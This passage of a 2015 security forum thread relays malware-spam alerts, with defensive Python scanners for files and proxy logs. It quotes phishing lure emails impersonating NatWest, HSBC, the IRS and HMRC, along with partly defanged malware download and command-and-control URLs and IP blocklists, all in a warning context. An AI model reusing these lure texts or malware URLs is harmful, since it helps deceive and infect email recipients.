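    for name, findings in run_samples().items():
        print(name, "->", findings or "clean")
```

The name check and the content check are deliberately independent: a renamed payload (the "same malware renamed as Invoice395687.DOC" case later in this thread) fails the name test but still trips the MZ or macro-stream test, and an innocuous-looking ZIP is opened so the member names inside are judged on their own.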
AplusWebMaster
2015-03-05, 14:36
FYI...
Fake 'Brochure' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/bobby-drell-abbottpainting-com-brochure2-doc-word-doc-or-excel-xls-spreadsheet-malware/
5 Mar 2015 - "'Brochure2.doc' pretending to come from Bobby Drell <rob@ abbottpainting .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please change the year to 2015.
Please confirm receipt
Thanks
Bobby Drell
5 March 2015 : Brochure2.doc - Current Virus total detections: 1/57* ... the malicious macro connects to & downloads data.gmsllp.com/js/bin.exe (dridex banking Trojan) which is saved as %Temp%\324235235.exe that has a virus total rate of 2/57** ... So far I am only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b400baf11a2a402f8ac05d1ecb99e81bbedebea859aae6918b16eaba8feff296/analysis/1425549729/
** https://www.virustotal.com/en/file/33abbf4f14f1b419618c1efb2dcbb346de815b7727b9caee02bc84ce4b675f5b/analysis/1425550694/
- http://blog.dynamoo.com/2015/03/malware-spam-bobby-drell.html
5 Mar 2015
"... Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24 "
___
Fake Natwest SPAM - PDF malware
- http://myonlinesecurity.co.uk/natwest-bankline-re-incident-im00491288-fake-pdf-malware/
5 Mar 2015 - "'RE: Incident IM00491288' pretending to come from Kevin Otero <Kevin.Otero@ bankline .natwest .com> with a zip attachment is another one from the current bot runs... different random names. So far names and email addresses seen are
Kevin Otero <Kevin.Otero@ bankline .natwest .com>
Collin Stovall <Collin.Stovall@ bankline .natwest .com>
Lavern Olsen <Lavern.Olsen@ bankline .natwest .com>
Rae Bouchard <Rae.Bouchard@ bankline .natwest .com>
Nadine Kerr <Nadine.Kerr@bankline .natwest .com>
... The email looks like:
Good Afternoon ,
Attached are more details regarding your account incident.
Please extract the attached content and check the details.
Please be advised we have raised this as a high priority incident and will endeavour to resolve it as soon as possible. The incident reference for this is IM00491288.
We would let you know once this issue has been resolved, but with any further questions or issues, please let me know.
Kind Regards,
Kevin Otero
Level 2 Adviser | Customer Experience Team, IB Service & Operations 7th Floor, 1 ...
5 March 2015: Incident IM00491288.zip: Extracts to: IM0743436407_pdf.exe
Current Virus total detections: 3/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/60243596f8d978350fdacc417e9945d4da6bd713733fa31fc44611c7f8a8eba8/analysis/1425548558/
___
Fake Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/carmel-wilson-alpro-invoices-7985974765-fake-pdf-malware/
5 Mar 2015 - "'Alpro Invoice(s): 7985974765' pretending to come from Alpro <carmel@ alpro .com> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Alpro.png
5 March 2015 : invoice7985974765.zip: Extracts to: invoice7985974765.exe
Current Virus total detections: 4/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6c69e4579d565906827983246c93ed0d43f408326a1e3fac351a4730226424f2/analysis/1425547819/
:fear: :mad:
AplusWebMaster
2015-03-06, 13:17
FYI...
Fake IRS SPAM - doc malware
- http://blog.dynamoo.com/2015/03/malware-spam-your-2015-electronic-ip.html
6 Mar 2015 - "This -fake- IRS email comes with a malicious attachment.
From: Internal Revenue Service [refund.noreply@ irs .gov]
Date: 6 March 2015 at 08:48
Subject: Your 2015 Electronic IP Pin!
Dear Member
This is to inform you that our system has generated your new secured Electronic PIN to e-file your 2014 tax return.
Please kindly download the microsoft file to securely review it.
Thanks
Internal Revenue Service ...
... attachment TaxReport(IP_PIN).doc ... there are usually several different versions[1]. Currently this is -undetected- by AV vendors*. This contains a malicious macro... which downloads a component from the following location:
http ://chihoiphunumos .ru/js/bin.exe
There are probably other download locations, but the payload will be the same. This is saved as %TEMP%\324235235.exe and has a detection rate of 1/55**. Automated analysis tools... show attempted connections to:
92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithuania)
According to the Malwr report this executable drops another version of itself [VT 1/56***] and a malicious DLL [VT 2/56****].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
104.232.32.119
87.236.215.103 "
* https://www.virustotal.com/en/file/d3a6e6b43461f3cf80b8e664d61213e67755fd20569332ec35e4502822a7231b/analysis/1425632162/
** https://www.virustotal.com/en/file/8073a8324b1c42da3e7eec6d0c77cf980497fd260a68358a350fd1f1d058cdbb/analysis/1425632174/
*** https://www.virustotal.com/en/file/a96f7f894b88f8521ec196a2da4527ba026b8134a99a55e02fd7c4d023a2554c/analysis/1425632946/
**** https://www.virustotal.com/en/file/84ccc4b9d6b67c56dc48a022d207f5490f49ea81661d5d655fce705c0274f3aa/analysis/1425632950/
[1] http://myonlinesecurity.co.uk/internal-revenue-service-your-2015-electronic-ip-pin-word-doc-or-excel-xls-spreadsheet-malware/
6 Mar 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Your-2015-Electronic-IP-Pin.png
___
Fake 'Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/mick-george-invoice-395687-for-dudley-construction-ltd-word-doc-or-excel-xls-spreadsheet-malware/
6 Mar 2015 - "'Mick George Invoice 395687 for Dudley Construction Ltd' pretending to come from Mick George Invoicing <mginv@ mickgeorge .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... These emails today, so far, are all malformed and broken. Every copy that I have received appears garbled and doesn’t actually have an attachment. Some mail servers will be configured to repair the damage and deliver the email in its full glory, where it will potentially infect you. This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Mick-George-invoice.png
... the malware payload will be identical to today’s other malicious office document run Internal Revenue Service Your 2015 Electronic IP Pin! – word doc or excel xls spreadsheet malware*. We do notice that the bad guys are using 2 or 3 subjects and email templates but using the same malware that has been -renamed- ...
Edit: I have managed to extract the malware payload from a quarantined copy on the server and can confirm that it is the -same- malware payload as today’s other run although renamed as Invoice395687.DOC . So far I am only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments..."
* http://myonlinesecurity.co.uk/internal-revenue-service-your-2015-electronic-ip-pin-word-doc-or-excel-xls-spreadsheet-malware/
- http://blog.dynamoo.com/2015/03/malware-spam-mick-george-invoice-395687.html
6 Mar 2015 - "This -malformed- spam is meant to have a malicious attachment... This malware and the payload it drops is identical to the one found in this -fake- IRS spam run* earlier today..."
* http://blog.dynamoo.com/2015/03/malware-spam-your-2015-electronic-ip.html
___
Fake Bankline SPAM - malware
- http://blog.dynamoo.com/2015/03/malware-spam-you-have-received-new.html
6 Mar 2015 - "This fake banking spam leads to malware.
From: Bankline [secure.message@ business .natwest .com]
Date: 6 March 2015 at 10:36
Subject: You have received a new secure message from BankLine
You have received a secure message.
Your Documents have been uploaded to Cubby cloud storage.
Cubby cloud storage is a cloud data service powered by LogMeIn, Inc.
Read your secure message by following the link bellow: ...
<redacted> ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 8719.
First time users - will need to register after opening the attachment...
This downloads a ZIP file from cubbyusercontent .com which contains a malicious executable Business Secure Message.exe which has a VirusTotal detection rate of just 1/57*. Automated analysis tools... show attempted connections to the following URLs:
http ://all-about-weightloss .org/wp-includes/images/vikun.png
http ://bestcoveragefoundation .com/wp-includes/images/vikun.png
http ://190.111.9.129 :14248/0603no11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
http ://190.111.9.129 :14249/0603no11/HOME/41/7/4/
It also appears that there is an attempted connection to 212.56.214.203.
Of all of these IPs, 190.111.9.129 (Navega.com, Guatemala) is the most critical to -block-.
It is also a characteristic of this malware (Upatre/Dyre) that it connects to checkip.dyndns .org to work out the IP address of the infected machine, it is worth checking for traffic to this domain. The Malwr report shows several dropped files, including fyuTTs27.exe which has a VirusTotal detection rate of 4/57**."
* https://www.virustotal.com/en/file/d32b3101ed671c91c71a85946fbbfc8027108b0e82713a427c6f99560e2a4c89/analysis/1425640773/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
192.254.186.169: https://www.virustotal.com/en/ip-address/192.254.186.169/information/
46.151.254.183: https://www.virustotal.com/en/ip-address/46.151.254.183/information/
5.178.43.49: https://www.virustotal.com/en/ip-address/5.178.43.49/information/
212.56.214.203: https://www.virustotal.com/en/ip-address/212.56.214.203/information/
UDP communications
74.125.200.127: https://www.virustotal.com/en/ip-address/74.125.200.127/information/
** https://www.virustotal.com/en/file/8344db76faf830e10acf0babb512bc1fca9774f53fe084e13633a23a62879b1d/analysis/1425641282/
... Behavioural information
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.116.122.136: https://www.virustotal.com/en/ip-address/217.116.122.136/information/
___
Fake HSBC SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-fake-pdf-malware/
6 Mar 2015 - "'HSBC Payment' pretending to come from HSBC <no-replay@ hsbc .co.uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/HSBC-Payment.png
6 March 2015: HSBC-2739.zip: Extracts to: HSBC-2739.exe
Current Virus total detections: 0/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4702fdc4487d8d8e657e74d87a3fbc20ca1b433aba29b52891fd83319dc8a209/analysis/1425636158/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
5.10.69.232: https://www.virustotal.com/en/ip-address/5.10.69.232/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
77.72.169.167: https://www.virustotal.com/en/ip-address/77.72.169.167/information/
77.72.169.166: https://www.virustotal.com/en/ip-address/77.72.169.166/information/
___
Fake Gateway SPAM - PDF malware
- http://myonlinesecurity.co.uk/your-online-gateway-gov-uk-submission-fake-pdf-malware/
6 Mar 2015 - "'Your online Gateway .gov .uk Submission' pretending to come from Gateway .gov.uk <ruyp@ bmtrgroup .com> with a link to download a zip attachment is another one from the current bot runs... The email looks like:
Your online Gateway .gov.uk Submission
Government Gateway logo
Electronic Submission Gateway
Thank you for your submission for the Government Gateway.
The Government Gateway is the UK’s centralized registration service for e-Government services.
To view/download your form to the Government Gateway please visit http ://www.gateway .gov.uk/
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov .uk - the best place to find government services and information - Opens in new window
The best place to find government services and information
The link in the email leads to... the same malware as today’s run of 'You have received a new secure message from BankLine' -fake- PDF malware*.
* http://myonlinesecurity.co.uk/received-new-secure-message-bankline-fake-pdf-malware/
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___
Cryptowall, again!
- https://isc.sans.edu/diary.html?storyid=19427
Last Updated: 2015-03-06 - "A new variant of Cryptowall (An advanced version of cryptolocker) is now using a malicious .chm file attachment to infect systems. According to net-security.org*, Bitdefender labs has found a -spam- wave that spread malicious .chm attachments. CHM is the compiled version of html that supports technologies such as JavaScript which can -redirect- a user to an external link. “Once the content of the .chm archive is accessed, the malicious code downloads from this location http :// *********/putty.exe, saves itself as %temp%\natmasla2.exe and executes the malware. A command prompt window opens during the process”..."
* http://net-security.org/malware_news.php?id=2981
Mar 5, 2015
> http://www.net-security.org/images/articles/cryptowall-calc.jpg
:fear::fear: :mad:
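The 6 Mar 2015 posts above end with two concrete defender actions: a recommended blocklist of IPs and CIDR ranges, and the note that Upatre/Dyre contacts checkip.dyndns.org, so traffic to that domain is worth checking. The following is an added example, not code from this thread or from dynamoo, that turns both into a check over proxy logs. The log layout is a hypothetical one invented for the example, the log lines are constructed (line 2 reuses the C2 URL path quoted in the Bankline write-up, and the 203.0.113.x / 198.51.100.x destinations are documentation ranges standing in for ordinary traffic), and the indicator list is taken from the posts above:

```python
import ipaddress
import re

# Blocklist as published in the 6 Mar 2015 dynamoo post quoted above, plus
# the Upatre/Dyre host 190.111.9.129 that the Bankline write-up singles out.
BLOCKLIST = [
    "92.63.82.0/23", "92.63.84.0/22", "92.63.88.0/24", "95.163.121.0/24",
    "104.232.32.119", "87.236.215.103", "190.111.9.129",
]
# The write-up notes that Upatre/Dyre asks checkip.dyndns.org for the
# victim's public IP, so a request to it from a workstation is worth a look.
WATCH_DOMAINS = {"checkip.dyndns.org"}


def compile_blocklist(entries):
    """Turn CIDR strings and bare IPs into ip_network objects (bare IP -> /32)."""
    return [ipaddress.ip_network(entry, strict=False) for entry in entries]


def match_ip(ip, nets):
    """Return the first network containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    return next((net for net in nets if addr in net), None)


# Hypothetical proxy-log layout used only for this example:
# <timestamp> <client_ip> <dst_ip>:<port> <host> <method> <path>
LOG_RE = re.compile(r"^(\S+) (\S+) (\d{1,3}(?:\.\d{1,3}){3}):(\d+) (\S+) (\S+) (\S+)$")


def scan_log(lines, nets, domains):
    """Return a list of (line_no, client_ip, reason) for lines touching an indicator."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # a production parser would count unparsable lines
        _ts, client, dst, port, host, _method, _path = m.groups()
        net = match_ip(dst, nets)
        if net is not None:
            hits.append((line_no, client, f"{dst}:{port} is in blocklist entry {net}"))
        if host.lower() in domains:
            hits.append((line_no, client, f"request to watched domain {host}"))
    return hits


def clients_to_isolate(hits):
    """Distinct internal hosts that produced at least one hit, sorted."""
    return sorted({client for _, client, _ in hits})


# Constructed sample log (not captured traffic).
SAMPLE_LOG = [
    "2015-03-06T10:41:02Z 10.0.0.15 203.0.113.10:443 example.org GET /",
    "2015-03-06T10:41:05Z 10.0.0.15 190.111.9.129:14248 190.111.9.129 GET /0603no11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK",
    "2015-03-06T10:41:06Z 10.0.0.15 216.146.38.70:80 checkip.dyndns.org GET /",
    "2015-03-06T10:42:10Z 10.0.0.22 95.163.121.200:80 95.163.121.200 POST /",
    "2015-03-06T10:43:00Z 10.0.0.31 198.51.100.7:80 www.example.com GET /index.html",
]


def run_sample():
    """Scan the constructed log against the blocklist and watched domains."""
    nets = compile_blocklist(BLOCKLIST)
    return scan_log(SAMPLE_LOG, nets, WATCH_DOMAINS)


if __name__ == "__main__":
    hits = run_sample()
    for line_no, client, reason in hits:
        print(f"line {line_no} client {client}: {reason}")
    print("isolate:", clients_to_isolate(hits))
```

Matching on the destination IP rather than the host header is what catches the C2 traffic here: the Bankline sample talks to 190.111.9.129 by raw IP on a high port, so there is no hostname to alert on, while the checkip.dyndns.org lookup is the opposite case, a perfectly legitimate service whose only suspicious property is which internal machine asked for it.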
AplusWebMaster
2015-03-09, 15:34
FYI...
Fake 'Statement' SPAM - doc malware
- http://myonlinesecurity.co.uk/statement-from-marketing-technology-group-inc-fake-pdf-malware/
9 Mar 2015 - "'Statement from MARKETING & TECHNOLOGY GROUP, INC.' pretending to come from TECHNOLOGY GROUP <rwilborn@ mtgmediagroup .com> with a zip attachment is another one from the current bot runs... The email looks like:
Dear Customer :
Your statement is attached. Please remit payment at your
earliest convenience.
Thank you for your business – we appreciate it very
much.
Sincerely,
MARKETING & TECHNOLOGY GROUP, INC
9 March 2015: docs2015.zip: Extracts to: docs2015.exe
Current Virus total detections: 2/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1b893ca3b782679b1e5d1afecb75be7bcc145b5da21a30f6c18dbddc9c6de4e7/analysis/1425899308/
___
Fake 'Credit Application' SPAM – PDF malware
- http://myonlinesecurity.co.uk/emailing-serv-ware-credit-application-pdf-fake-pdf-malware/
9 Mar 2015 - "'Emailing: Serv-Ware Credit Application.pdf' with a zip attachment pretending to come from clint@ servware .com is another one from the current bot runs... The email looks like:
—
Thanks,
Clint Winstead
Manager
Serv-Ware Products
clint@ servware .com
phone: 800.768.5953
fax : 800.976.1299 ...
9 March 2015: Serv-WareCreditApplication.zip: Extracts to: Serv-WareCreditApplication.exe
Current Virus total detections: 8/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d48507819dd4a42b1f751cc0f60884513389f1be25b34f642e0276cdabbbece9/analysis/1425915088/
... Behavioural information
TCP connections
75.127.114.162: https://www.virustotal.com/en/ip-address/75.127.114.162/information/
UDP communications
77.72.174.163: https://www.virustotal.com/en/ip-address/77.72.174.163/information/
77.72.174.162: https://www.virustotal.com/en/ip-address/77.72.174.162/information/
___
Paypal PHISH
- http://myonlinesecurity.co.uk/your-paypal-account-is-limited-take-action-now%E2%80%8F-phishing/
8 Mar 2015 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying something like:
There have been unauthorised or suspicious attempts to log in to your account, please verify
Your account has exceeded its limit and needs to be verified
Your account will be suspended !
You have received a secure message from < your bank>
We are unable to verify your account information
Update Personal Information
Urgent Account Review Notification
We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
Confirmation of Order
your PayPal account is limited – take action now
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/your-PayPal-account-is-limited-take-action-now.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details..."
:fear: :mad:
AplusWebMaster
2015-03-10, 17:04
FYI...
Fake 'PMQ agreement' SPAM - PDF malware
- http://myonlinesecurity.co.uk/2015-pmq-agreement-linda-pmq-fake-pdf-malware/
10 Mar 2015 - "'2015 PMQ agreement' pretending to come from linda@ pmq .com with a zip attachment is another one from the current bot runs... The email looks like:
HI
I have Not received your signed contract for the 2015 ad campaign. If you would please sign and return.
Thank you
Linda
—
Watch our 2015 PMQ Media Kit here ...
PMQ Pizza Magazine
Linda Green / Co-Publisher
(662)234-5481 ext 121 / linda.pmq@ gmail .com
cell (662)801-5495
PMQ Pizza Magazine Office: 662-234-5481 x121 / Fax: 662-234-0665
605 Edison Street, Oxford, MS 38655 ...
Don’t forget to renew your subscription to the magazine at ...
10 March 2015 : American_Wholesale.zip: Extracts to: American_Wholesale.exe
Current Virus total detections: 9/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae71d65a32303f1f129292420532be2c907d04a05c1aef9a429ecf487b578681/analysis/1425997192/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
95.181.53.78: https://www.virustotal.com/en/ip-address/95.181.53.78/information/
122.155.1.42: https://www.virustotal.com/en/ip-address/122.155.1.42/information/
77.85.204.114: https://www.virustotal.com/en/ip-address/77.85.204.114/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
208.91.197.54: https://www.virustotal.com/en/ip-address/208.91.197.54/information/
173.194.71.127: https://www.virustotal.com/en/ip-address/173.194.71.127/information/
___
Apple Watch Giveaway Spam Clocks In on Twitter
- https://blog.malwarebytes.org/privacy-2/2015/03/apple-watch-giveaway-spam-clocks-in-on-twitter/
Mar 10, 2015 - "Twitter users should be aware that mentioning the new Apple Watch could result in -spam- headed their way:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/watchspm0.jpg
... The so-called Apple Giveaways profile says the following in its Bio space:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/watchspm6.jpg
It may sound promising, but what follows is a semi-exhausting jaunt around a couple of different websites with instructions to follow along the way... What we do end up with is a wall of text on a Facebook page with some very specific hoops to jump through in order to obtain the watch... they claim they’ll direct message within 72 hours with a “confirmation link”. The creation date for the website is listed as March 9th, and the Whois details are hidden behind a Whoisguard so there’s no way to know who you’re sending your information to... this seems like a long shot in terms of “winning” the incredibly expensive watch..."
:fear::fear: :mad:
AplusWebMaster
2015-03-11, 14:43
FYI...
Fake 'Tax rebate' SPAM – doc or xls malware
- http://myonlinesecurity.co.uk/your-tax-rebate-word-doc-or-excel-xls-spreadsheet-malware/
11 Mar 2015 - "'Your Tax rebate' pretending to come from HMRC Revenue&Customs with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
HM revenue
Dear ...
After the last yearly computations of your financial functioning we have defined that you
have the right to obtain a tax rebate of 934.80.
Please confirm the tax rebate claim and permit us have
6-9 days so that we execute it.
A rebate can be postponed for a variety of reasons.
For instance confirming unfounded data or applying
not in time.
To access the form for your tax rebate, view the report attached. Document Reference: (983EMI).
Regards,
HM Revenue Service. We apologize for the inconvenience...
The malware payload with this template is same as today’s "Your Remittance Advice [FPAEEKBYQU] – Word doc malware"* . So far I am only seeing 1 version of this malware..."
* http://myonlinesecurity.co.uk/your-remittance-advice-fpaeekbyqu-word-doc-malware/
- http://blog.dynamoo.com/2015/03/malware-spam-bacs-remittance-advice.html
11 Mar 2015
"... Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177 "
___
Fake 'Remittance' SPAM - doc or xml malware
- http://myonlinesecurity.co.uk/your-remittance-advice-fpaeekbyqu-word-doc-malware/
11 Mar 2015 - "'Your Remittance Advice [FPAEEKBYQU] (random characters)' coming from random names and email addresses with a malicious word doc or xml attachment is another one from the current bot runs... The email looks like:
Good Morning,
Please find attached the BACS Remittance Advice for payment made by FORUM ENERGY.
Please note this may show on your account as a payment reference of FPANJRCXFM.
Kind Regards
Marilyn Aguilar
Accounts Payable
11 March 2015 : Rem_7656CN.xml - Current Virus total detections: 2/57*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c7af5902e5922a9a89c4464a36b5c4f6d98e8d613a412581d7f64c2fab4ce2fb/analysis/1426068203/
___
Fake blank body SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/inv-09-03-jora-service-word-doc-or-excel-xls-spreadsheet-malware/
11 Mar 2015 - "'inv.09.03' pretending to come from Jora Service <jora.service@ yahoo .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email has a totally empty body with just the attachment.
11 March 2015 : INV 86-09.03.2015.doc - Current Virus total detections: 0/56*
So far I am only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments..."
* https://www.virustotal.com/en/file/52e7cf353466ed7a34da9fd5be5b14ac25a364493ac41ab7626b421904277943/analysis/1426067908/
___
Fake 'admin.scanner' SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/message-from-rnp0026735991e2-word-doc-or-excel-xls-spreadsheet-malware/
11 Mar 2015 - "'Message from RNP0026735991E2' pretending to come from admin.scanner@ <your own email domain> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
This E-mail was sent from “RNP0026735991E2” (MP C305).
Scan Date: 11.03.2015 08:57:25 (+0100)
Queries to: admin.scanner@ ...
11 March 2015 : 201503071457.xls - Current Virus total detections: 0/56*
This looks like it is the same malware payload as today’s 'inv.09.03 Jora Service' – word doc or excel xls spreadsheet malware**..."
* https://www.virustotal.com/en/file/189f436ca27dc657552eafc9b39f21b7dee873f4669c1ce9d7c11eb39fbec89d/analysis/1426068752/
** http://myonlinesecurity.co.uk/inv-09-03-jora-service-word-doc-or-excel-xls-spreadsheet-malware/
- http://blog.dynamoo.com/2015/03/malware-spam-message-from.html
11 Mar 2015
"... Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159 "
___
Fake 'Rate Increase' SPAM - PDF malware
- http://myonlinesecurity.co.uk/please-phoenix-zhang-shin-p-j-international-ltd-fake-pdf-malware/
11 Mar 2015 - "'Please' pretending to come from Phoenix <phoenix@ pnjinternational .com> with a zip attachment is another one from the current bot runs... The email looks like:
Good Afternoon,
Please find attached notice regarding carriers pre-filing for an additional General Rate Increase for effective date of April 9, 2015. Please note, we are advising you of this filing in order to comply with FMC regulations. However, we feel it is unlikely that the carriers will be successful in implementing this increase, especially since the March 9th GRI has already been postponed to March 17th. We will continue to keep you updated as we receive additional information pertaining to these filed rate increases.
Phoenix Zhang-Shin
Director
P & J International Ltd
Calverley House, 55 Calverley Road
Tunbridge Wells, Kent, UK TN1 2TU ...
11 March 2015: documents-id323.zip: Extracts to: documents-id323.exe
Current Virus total detections: 3/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5a1467e9341ca5cf295fd84d76fcc38f7faccd573dbe6e872149eee64d26a9dc/analysis/1426081018/
... Behavioural information
TCP connections
216.146.39.70: https://www.virustotal.com/en/ip-address/216.146.39.70/information/
95.181.53.78: https://www.virustotal.com/en/ip-address/95.181.53.78/information/
209.126.254.152: https://www.virustotal.com/en/ip-address/209.126.254.152/information/
185.30.40.44: https://www.virustotal.com/en/ip-address/185.30.40.44/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
74.125.204.127: https://www.virustotal.com/en/ip-address/74.125.204.127/information/
___
Fake Voicemail SPAM - malicious attachment
- http://blog.dynamoo.com/2015/03/malware-spam-voicemail-message.html
11 Mar 2015 - "When was the last time someone sent you a voice mail message by email? Never? There are no surprises to find that this spam email message has a malicious attachment.
From: Voicemail admin@ victimdomain
Date: 11/03/2015 11:48
Subject: Voicemail Message (07813297716) From:07813297716
IP Office Voicemail redirected message
Attachment: MSG00311.WAV.ZIP
The attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57*. According to the Malwr report, it pulls down another executable and some config files from:
http ://wqg64j0ei .homepage.t-online .de/data/log.exe
http ://cosmeticvet .su/conlib.php
This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicious macros rather than EXE-in-ZIP attacks.
The executable it drops has a detection rate of 2/54**... Malwr reports ... show a further component download from:
http ://muscleshop15 .ru/js/jre.exe
http ://test1.thienduongweb .com/js/jre.exe
This component has a detection rate of 5/57***. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57**** which is the same Dridex binary we've been seeing all day. Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:
... Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159 "
* https://www.virustotal.com/en/file/205201a73bd0253b4b3b99640cfed9452e049c026a94b11e6ae0a3e3de0e34c9/analysis/1426091260/
** https://www.virustotal.com/en/file/e4de1d084bee03cc2c32f0debfbea477b1c5caa1edfe5845505585d8620937a2/analysis/1426091556/
*** https://www.virustotal.com/en/file/17abe560509c0ddb1c1e43a4ddd93539142a59dc3b347c90644027d93de27e30/analysis/1426092316/
**** https://www.virustotal.com/en/file/56982e69221e8d1ba0ab856a4891f579a4de92d0faabdcec06da38dd784d8a93/analysis/1426093429/
:fear: :mad:
AplusWebMaster
2015-03-12, 14:29
FYI...
Fake Invoice SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/invoice-random-for-payment-to-word-doc-or-excel-xls-spreadsheet-malware/
12 Mar 2015 - "'Invoice [random numbers] for payment to <random company>' coming from random names and companies with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus... The email has a totally blank-body and just a word or excel attachment with a random name...
11 March 2015 : 6780MHH.doc - Current Virus total detections: 0/56*
... which connects to & downloads https ://92.63.88.102 /api/gb1.exe which in turn is saved as %temp%\dsfsdfsdf.exe (virus total**). So far I am only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/1b0ab691ac932688ebb7745248bdc4e14e16db2e6cd283c1bb860d26c4ef8954/analysis/1426151513/
